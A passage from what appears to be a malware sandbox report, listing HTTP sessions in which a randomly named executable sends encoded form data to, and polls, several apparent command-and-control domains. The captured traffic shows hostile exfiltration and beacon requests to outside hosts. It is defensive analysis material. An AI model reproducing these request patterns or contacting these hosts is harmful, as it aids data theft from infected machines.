                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 71 6c 4f 4a 31 64 44 33 35 49 42 78 63 4d 4b 7a 30 4c 75 68 42 46 67 4e 63 43 6c 47 62 56 4d 7a 64 6e 71 6f 43 39 77 78 66 53 77 47 2b 6b 72 53 4f 7a 38 62 4e 57 58 34 55 53 65 45 42 65 6d 6b 4c 77 5a 37 50 68 4d 5a 34 5a 55 50 49 57 6f 50 4c 46 35 78 73 74 51 34 7a 6b 34 59 39 39 68 6e 4d 52 73 43 4b 2b 74 54 6c 43 44 58 6e 4d 42 59 2f 77 4a 45 73 47 79 71 46 64 77 47 6b 36 38 79 5a 73 49 50 39 31 7a 5a 49 4a 43 69 6c 65 68 6b 4e 6b 4d 57 68 66 62 43 43 44 64 76 65 77 41 38 76 68 48 4f 4c 66 77 73 78 61 2b 68 51 44 36 76 7a 63 39 33 71 77 3d 3d
                                                    Data Ascii: efM=7PZJRSXxbWSlqlOJ1dD35IBxcMKz0LuhBFgNcClGbVMzdnqoC9wxfSwG+krSOz8bNWX4USeEBemkLwZ7PhMZ4ZUPIWoPLF5xstQ4zk4Y99hnMRsCK+tTlCDXnMBY/wJEsGyqFdwGk68yZsIP91zZIJCilehkNkMWhfbCCDdvewA8vhHOLfwsxa+hQD6vzc93qw==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    38192.168.2.45543676.223.67.189802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:41.071110010 CEST738OUTPOST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 6f 7a 64 47 61 6f 42 38 77 78 59 53 77 47 6d 30 72 54 42 54 39 5a 4e 57 4c 77 55 54 69 45 42 66 43 6b 4c 31 64 37 49 53 6b 65 34 4a 55 4e 44 32 6f 42 47 6c 35 78 73 74 51 34 7a 6b 38 6d 39 39 70 6e 4d 67 38 43 4c 62 5a 55 35 53 44 51 67 4d 42 59 37 77 4a 49 73 47 79 45 46 59 6f 34 6b 35 49 79 5a 74 34 50 39 42 6e 61 43 4a 44 6e 36 75 67 42 65 6b 56 6e 75 66 66 4e 4a 46 52 7a 44 68 49 42 6a 48 57 55 61 75 52 37 6a 61 61 53 4e 45 7a 62 2b 66 41 2b 78 2f 7a 30 78 4a 66 57 62 48 78 76 2f 73 34 39 73 32 79 47 69 2f 59 3d
                                                    Data Ascii: efM=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYnozdGaoB8wxYSwGm0rTBT9ZNWLwUTiEBfCkL1d7ISke4JUND2oBGl5xstQ4zk8m99pnMg8CLbZU5SDQgMBY7wJIsGyEFYo4k5IyZt4P9BnaCJDn6ugBekVnuffNJFRzDhIBjHWUauR7jaaSNEzb+fA+x/z0xJfWbHxv/s49s2yGi/Y=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    39192.168.2.45543776.223.67.189802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:43.597143888 CEST10820OUTPOST /l2ei/ HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.rtrpodcast.online
                                                    Referer: http://www.rtrpodcast.online/l2ei/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 37 50 5a 4a 52 53 58 78 62 57 53 6c 72 46 65 4a 32 2b 72 33 38 6f 42 2b 5a 4d 4b 7a 37 72 76 4a 42 46 38 4e 63 41 4a 76 59 6e 67 7a 64 77 4f 6f 44 66 49 78 5a 53 77 47 34 6b 72 65 42 54 39 59 4e 57 54 30 55 54 75 55 42 63 71 6b 61 6a 68 37 4e 6a 6b 65 33 4a 55 4e 4d 57 6f 41 4c 46 34 31 73 74 67 38 7a 6c 4d 6d 39 39 70 6e 4d 69 55 43 4d 4f 74 55 37 53 44 58 6e 4d 42 55 2f 77 4a 73 73 43 6d 79 46 59 6b 6f 6b 4b 51 79 5a 4f 41 50 75 69 50 61 66 35 44 70 37 75 67 6a 65 6b 70 38 75 66 43 38 4a 46 4e 4a 44 68 4d 42 6a 43 76 4d 66 4d 4e 6a 38 36 4f 57 51 30 69 2f 2f 2f 77 37 78 4e 76 64 6e 63 2f 73 4f 48 35 6d 77 50 31 52 6f 6e 36 63 67 5a 36 31 59 69 69 42 43 50 58 59 6e 34 6b 56 37 65 62 2f 65 4f 6f 6e 68 32 77 63 41 55 6c 52 70 49 6e 55 70 2f 62 6d 41 52 4c 56 61 32 51 61 58 75 37 43 33 48 51 52 45 39 53 30 46 69 33 2b 79 66 4f 50 70 79 6b 75 76 30 46 79 67 79 53 4a 30 61 69 54 53 47 67 46 6a 43 44 44 46 32 37 64 68 77 49 2b 58 4e 36 57 61 69 7a 72 54 53 53 52 54 37 4b 77 2f 69 68 6d 50 4a [TRUNCATED]
                                                    Data Ascii: efM=7PZJRSXxbWSlrFeJ2+r38oB+ZMKz7rvJBF8NcAJvYngzdwOoDfIxZSwG4kreBT9YNWT0UTuUBcqkajh7Njke3JUNMWoALF41stg8zlMm99pnMiUCMOtU7SDXnMBU/wJssCmyFYkokKQyZOAPuiPaf5Dp7ugjekp8ufC8JFNJDhMBjCvMfMNj86OWQ0i///w7xNvdnc/sOH5mwP1Ron6cgZ61YiiBCPXYn4kV7eb/eOonh2wcAUlRpInUp/bmARLVa2QaXu7C3HQRE9S0Fi3+yfOPpykuv0FygySJ0aiTSGgFjCDDF27dhwI+XN6WaizrTSSRT7Kw/ihmPJUyULZTHFf2WZ5fB42ipgH1nAx4LlR1yMuCiVcruiyCmEvXBjSZsZXWCcbgUlP+llFv1WVfWEVrlZpC7oHWVzPdZ9qKqb94RmBhopjjvcts3b8EzbG/0dPeLelMcIDvHReifbTGNFJc5kKYcBeGaQoWkbJUff3GnKSz7w1C+yEpPOyKm+TrIjVdyOXTuS1nRqKh0bGU3yCY5MyLSS8mTKuhr5T8YgBPwF6rUQ8h8C3KLtpragOrZ969xdv1oSPCj+10P8cSUXvR6jqkeXGlGyeGtldq7cISQoD2ETKQlHeHp1Gcz/xsWi6YPDdKgNmoak6abMmAHfbNpSW/j9Wfyg9BqBVUMjp21o3IgiQhkHLIQfrRD6W8oLAh/68rPA1GaqS5TQGK5FF7XsgcJC8oOrq5coRyKbN63Z+CqsFJwkducktNYrM14pIy0Sna9dAIaUdM2IVKRq84M0nSxV2Zm1aSDBHlikQFqVrEX9sN2gGGzx6bxHOW7b5i+nDwGAgGzXjza52ST7cvQDHyPjrsUCbiwRn9KfBqJEx6SUURLElkpPzx5+9lug2OvdpnDMUHKjeeDffsnOanrcyxvrBiS2HEBa7pbco+KMgDkxtlRmPOnbfH0Pkn9RAOC3Z/35vfIHiRpULAD4OnDdzTe8/V2lel4qvbpy5Fisrt [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    40192.168.2.45543876.223.67.189802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:33:46.133927107 CEST442OUTGET /l2ei/?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM= HTTP/1.1
                                                    Host: www.rtrpodcast.online
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Aug 5, 2024 15:33:46.607428074 CEST393INHTTP/1.1 200 OK
                                                    Server: openresty
                                                    Date: Mon, 05 Aug 2024 13:33:46 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 253
                                                    Connection: close
                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 54 50 3d 75 68 71 70 6a 78 49 50 68 26 65 66 4d 3d 32 4e 78 70 53 6e 65 66 52 53 4f 70 67 41 2b 42 6f 4f 6e 69 7a 2f 31 75 54 74 72 78 7a 72 66 69 4c 6d 4d 5a 58 6a 70 66 65 48 67 75 61 77 61 56 59 4f 4d 68 65 68 51 7a 77 79 58 4a 53 6e 35 64 4e 56 33 70 61 78 43 6b 4c 66 71 44 57 54 39 79 4c 78 49 4e 78 6f 6f 4b 41 47 67 4a 44 43 64 56 73 39 34 38 69 44 73 67 36 38 31 46 45 41 45 4e 43 35 56 47 6b 69 4d 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                    Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GTP=uhqpjxIPh&efM=2NxpSnefRSOpgA+BoOniz/1uTtrxzrfiLmMZXjpfeHguawaVYOMhehQzwyXJSn5dNV3paxCkLfqDWT9yLxINxooKAGgJDCdVs948iDsg681FEAENC5VGkiM="}</script></head></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    41192.168.2.455439116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:00.170471907 CEST700OUTPOST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 66 30 49 57 68 37 31 43 51 39 56 65 38 45 6a 61 49 62 66 72 6f 50 50 38 41 4e 58 4e 73 77 38 72 33 36 6d 38 69 41 73 6c 63 30 74 62 59 54 66 50 61 41 34 76 2f 52 2f 4a 54 56 72 46 4c 76 59 75 35 49 32 63 32 65 31 4a 63 2b 48 62 75 48 77 41 49 67 6a 2b 36 64 7a 6b 55 6f 76 70 61 48 75 4f 69 66 37 67 78 32 78 59 6e 6b 37 71 4e 45 72 39 39 46 4a 42 70 52 58 34 54 39 6a 73 55 2f 58 58 50 50 56 6b 33 76 47 50 71 73 62 50 57 4c 44 70 38 6a 63 48 59 75 51 48 4b 68 76 32 77 51 62 2b 63 67 32 63 51 66 79 46 7a 32 6b 33 66 68 5a 42 70 51 4d 39 4a 67 3d 3d
                                                    Data Ascii: efM=66EHT97zYqu5f0IWh71CQ9Ve8EjaIbfroPP8ANXNsw8r36m8iAslc0tbYTfPaA4v/R/JTVrFLvYu5I2c2e1Jc+HbuHwAIgj+6dzkUovpaHuOif7gx2xYnk7qNEr99FJBpRX4T9jsU/XXPPVk3vGPqsbPWLDp8jcHYuQHKhv2wQb+cg2cQfyFz2k3fhZBpQM9Jg==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    42192.168.2.455440116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:02.711033106 CEST720OUTPOST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 6f 72 33 59 2b 38 6a 43 55 6c 52 55 74 62 66 6a 66 4b 55 67 34 61 2f 52 37 76 54 51 44 46 4c 76 4d 75 35 4a 47 63 32 74 64 47 64 75 48 56 31 33 77 65 47 41 6a 2b 36 64 7a 6b 55 6f 71 2b 61 48 32 4f 69 76 72 67 79 58 78 62 75 45 36 59 45 6b 72 39 35 46 4a 46 70 52 57 76 54 38 2b 35 55 39 66 58 50 4f 46 6b 33 2b 47 49 67 73 62 42 59 72 43 6a 37 51 39 43 42 37 31 39 56 43 2f 49 75 68 66 42 55 47 6e 47 42 75 54 53 68 32 41 45 43 6d 51 31 6b 54 78 30 53 6e 51 4a 6a 43 45 45 6b 4b 59 54 72 45 76 6b 4f 4f 41 58 58 6b 59 3d
                                                    Data Ascii: efM=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCor3Y+8jCUlRUtbfjfKUg4a/R7vTQDFLvMu5JGc2tdGduHV13weGAj+6dzkUoq+aH2OivrgyXxbuE6YEkr95FJFpRWvT8+5U9fXPOFk3+GIgsbBYrCj7Q9CB719VC/IuhfBUGnGBuTSh2AECmQ1kTx0SnQJjCEEkKYTrEvkOOAXXkY=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    43192.168.2.455441116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:05.237059116 CEST10802OUTPOST /jda9/ HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.mqmsqkw.lol
                                                    Referer: http://www.mqmsqkw.lol/jda9/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 36 36 45 48 54 39 37 7a 59 71 75 35 65 56 34 57 6a 63 4a 43 56 64 56 64 7a 6b 6a 61 47 4c 66 56 6f 4f 7a 38 41 4a 48 64 74 43 77 72 33 4c 32 38 68 6c 34 6c 51 55 74 62 63 6a 66 4c 55 67 34 48 2f 52 44 6a 54 51 47 77 4c 74 30 75 37 76 79 63 2f 38 64 47 54 75 48 56 71 48 77 66 49 67 6a 52 36 64 6a 67 55 6f 36 2b 61 48 32 4f 69 74 6a 67 6b 32 78 62 69 6b 37 71 4e 45 72 68 39 46 4a 39 70 56 43 2f 54 38 36 70 56 4e 2f 58 42 50 31 6b 37 73 2b 49 6f 73 61 6e 62 72 44 32 37 51 78 4a 42 2f 56 41 56 42 6a 69 75 68 72 42 58 67 57 6c 57 4e 62 77 6a 56 56 61 51 55 6b 75 6e 51 42 70 52 30 46 77 75 7a 55 62 38 62 6c 35 76 54 48 74 57 39 49 44 55 52 64 36 76 73 55 33 6f 6e 61 54 38 76 47 71 36 73 45 41 66 4e 6d 59 62 4f 75 2b 4c 59 52 6d 4b 65 6a 57 53 32 38 4f 79 7a 73 51 72 4a 4e 4b 68 46 37 54 57 39 46 42 6c 38 57 6e 2b 74 72 2f 69 36 54 70 78 64 41 5a 6c 4b 2b 53 79 37 65 5a 77 45 64 42 77 34 61 41 56 6e 78 67 63 49 62 71 55 77 68 35 45 62 69 31 7a 37 50 79 77 35 54 73 55 39 74 44 52 30 46 79 62 4c [TRUNCATED]
                                                    Data Ascii: efM=66EHT97zYqu5eV4WjcJCVdVdzkjaGLfVoOz8AJHdtCwr3L28hl4lQUtbcjfLUg4H/RDjTQGwLt0u7vyc/8dGTuHVqHwfIgjR6djgUo6+aH2Oitjgk2xbik7qNErh9FJ9pVC/T86pVN/XBP1k7s+IosanbrD27QxJB/VAVBjiuhrBXgWlWNbwjVVaQUkunQBpR0FwuzUb8bl5vTHtW9IDURd6vsU3onaT8vGq6sEAfNmYbOu+LYRmKejWS28OyzsQrJNKhF7TW9FBl8Wn+tr/i6TpxdAZlK+Sy7eZwEdBw4aAVnxgcIbqUwh5Ebi1z7Pyw5TsU9tDR0FybLs3rmaaF4tjkyr5K24ONWJdR0Rw88lX5JEvtOufbUSGa83GeoLY/x3oiXmDwk2c1DZq1XF5/i5LnLC+sAVLjruuXNRSMv+dFV+ijNh5PTdNl1KSvwblVEurWxDHV+zJV0sjD9+HUqNCyuaQlRegtS2D5qz7mQJTGNI3f5DHhwr2VTg2niwY/lIGipisbhEG7rtFs/w+n9ef4hX8YKgVvSzBmCUCdrFbDTY86D28vcnPDAm6VpPCylytZ7DWooNpSkBIMvzZ9pQccHVUaAjq+MFImOny3gNulPU/dOuo9taKTU0HAu9aCsn/LRYw9auMTfT23HCDlcLW00z/NadVhJ8IshNwD6wtB0mXTTY1WNzksO+e9Z0IYrH0Wn00Uq8Ep34Z8jKihX8WNoHoyX78jGOt2ICWIYzeGHYfZR+AAt2tJPy3OTd+ylgyVAgyj9gZ42SWf8j2UUM7V2nkbjhdYBcc5ipCWwaKQjNj2EbcN6Vc+vevikptMnaVkw+mhqnEyXcw+Z0OjdCwoFt3ICjOtivVNPAyWHfv52Yl/p9eTywKVTUlE1xG+5m/6hjIJKp+qq8hSGBrFojP29KPvDzRcpPB8YYBm3rhEiX+czKNLTPLA0xB/As92udkEFh6sT1eI7hlOtirW1QHEliq9J5gieTAkgIHi4r1Plrk [TRUNCATED]


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    44192.168.2.455442116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:07.770054102 CEST436OUTGET /jda9/?GTP=uhqpjxIPh&efM=34snQIO0a+qzYlkt+6IEft1gxD/ZK6L7qOToIJHZshoLhvuGziw8TW5Od2ToMUc/iXvMW07TMOYG4pWJ/ehZbdqmuEYhDCzj/N3rZv+VTG2UiN/ilnh8230= HTTP/1.1
                                                    Host: www.mqmsqkw.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Language: en-US,en
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    45192.168.2.455443116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:34.662576914 CEST700OUTPOST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 200
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 69 63 61 45 74 47 79 59 6d 31 6d 61 35 73 79 53 53 33 41 73 55 7a 38 36 36 6b 4b 64 64 4e 65 45 77 5a 58 70 57 58 43 49 50 48 50 31 6e 58 51 35 63 49 38 38 79 76 65 56 77 47 44 49 78 70 65 6c 68 65 76 35 75 69 35 55 34 62 6c 51 75 42 45 70 6e 59 58 53 66 47 72 53 43 6a 6f 2b 37 37 4f 72 46 6e 59 31 49 55 75 46 5a 58 78 44 71 79 6b 6b 50 35 62 49 67 49 6a 4e 58 4b 7a 6d 43 36 4e 56 35 6e 63 4a 4d 73 57 68 4d 6d 56 6d 79 6e 72 69 37 58 64 4c 43 6c 62 6f 5a 64 38 56 67 63 6d 63 58 67 45 45 4a 73 34 56 58 34 33 4b 58 72 57 6c 53 6e 63 6a 43 51 3d 3d
                                                    Data Ascii: efM=LugYlboQcaRDicaEtGyYm1ma5sySS3AsUz866kKddNeEwZXpWXCIPHP1nXQ5cI88yveVwGDIxpelhev5ui5U4blQuBEpnYXSfGrSCjo+77OrFnY1IUuFZXxDqykkP5bIgIjNXKzmC6NV5ncJMsWhMmVmynri7XdLClboZd8VgcmcXgEEJs4VX43KXrWlSncjCQ==


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    46192.168.2.455444116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:37.207216024 CEST720OUTPOST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 220
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 36 45 77 35 6e 70 58 57 43 49 49 48 50 31 76 33 51 34 44 34 38 6e 79 76 53 73 77 48 2f 49 78 6f 36 6c 68 63 6e 35 74 52 52 54 36 4c 6c 4f 37 52 45 72 34 49 58 53 66 47 72 53 43 6e 4a 6a 37 34 2b 72 46 57 6f 31 4f 31 75 45 48 48 78 45 74 79 6b 6b 4c 35 62 54 67 49 6a 76 58 49 58 4d 43 34 31 56 35 6d 73 4a 4c 2b 2b 75 47 6d 56 73 39 48 71 4f 37 32 4d 73 45 33 71 63 59 37 52 77 6c 74 2b 6f 66 47 56 65 59 64 5a 43 46 34 54 35 4b 73 66 52 66 6b 68 71 5a 58 35 42 57 64 6e 50 6c 62 62 53 39 34 75 6c 73 70 39 55 53 70 73 3d
                                                    Data Ascii: efM=LugYlboQcaRDj9KEiHyYu1md8sySbXASUzg66kizd/6Ew5npXWCIIHP1v3Q4D48nyvSswH/Ixo6lhcn5tRRT6LlO7REr4IXSfGrSCnJj74+rFWo1O1uEHHxEtykkL5bTgIjvXIXMC41V5msJL++uGmVs9HqO72MsE3qcY7Rwlt+ofGVeYdZCF4T5KsfRfkhqZX5BWdnPlbbS94ulsp9USps=


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    47192.168.2.455445116.213.43.190802056C:\Program Files (x86)\OdVShYEfvuoQpUSdhdNyXYJLKLphdQTMorXfWKklqjKeebYq\MHFAGZiftf.exe
                                                    TimestampBytes transferredDirectionData
                                                    Aug 5, 2024 15:34:39.739084959 CEST10802OUTPOST /yxos/ HTTP/1.1
                                                    Host: www.lfghtko.lol
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US,en
                                                    Origin: http://www.lfghtko.lol
                                                    Referer: http://www.lfghtko.lol/yxos/
                                                    Content-Length: 10300
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                                    Data Raw: 65 66 4d 3d 4c 75 67 59 6c 62 6f 51 63 61 52 44 6a 39 4b 45 69 48 79 59 75 31 6d 64 38 73 79 53 62 58 41 53 55 7a 67 36 36 6b 69 7a 64 2f 79 45 77 4b 76 70 58 31 71 49 4a 48 50 31 6c 58 51 44 44 34 38 6d 79 73 69 6f 77 48 7a 32 78 71 79 6c 67 2f 2f 35 6f 67 52 54 67 62 6c 4f 6b 68 45 6f 6e 59 58 48 66 43 50 57 43 6a 74 6a 37 34 2b 72 46 56 77 31 4e 6b 75 45 46 48 78 44 71 79 6b 34 50 35 61 64 67 49 36 53 58 49 43 37 43 4d 4a 56 35 46 55 4a 4e 4c 4b 75 4b 6d 56 69 38 48 71 57 37 32 41 7a 45 33 6d 6d 59 2f 51 62 6c 74 61 6f 62 6e 74 64 4c 2f 78 56 66 4a 48 30 56 4d 50 51 64 31 51 6d 58 6e 70 47 51 74 6d 57 32 6f 7a 52 36 34 66 7a 35 70 64 79 54 73 2f 4e 72 47 50 67 6e 34 31 34 78 75 52 65 5a 67 4e 42 6a 6a 51 46 56 62 7a 6d 6f 78 30 4f 33 34 68 6e 4d 58 49 56 31 36 73 50 6d 7a 7a 68 67 74 45 36 6e 72 5a 75 47 4a 48 30 50 36 38 4b 47 6b 53 4f 54 34 78 56 4d 49 42 52 57 4b 4b 54 41 68 62 47 77 36 4f 33 47 4f 4c 47 72 62 65 4c 4d 50 4e 49 56 2b 6c 42 56 68 33 33 2f 38 30 45 38 53 69 7a 77 55 61 68 59 67 [TRUNCATED]
